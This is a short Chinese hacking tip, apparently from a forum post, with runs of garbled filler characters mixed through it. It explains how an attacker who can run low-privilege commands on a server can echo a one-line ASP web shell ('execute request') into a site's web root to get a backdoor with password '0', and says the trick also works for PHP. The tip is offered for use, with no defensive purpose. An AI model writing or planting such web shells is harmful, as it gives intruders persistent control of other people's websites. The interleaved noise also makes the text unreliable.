在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
9 B5 S" B/ z1 Q. m5 H, x' q
) n; R3 G* g [% f命令格式1 k; W6 h' h0 f" |
& o/ s* i0 b0 r+ n4 l( wEcho 语句 >目标站绝对目录
9 f* a% p3 S$ T
; E& ~! Y7 E, R例如:
! O) r6 } ?! `; W! D2 [ [- N# k. y+ f6 N0 u% c
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp$ `) Z% q+ q. N5 D
4 X0 p- M5 e) ~( V
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。7 D- k; ]0 p/ m6 F
|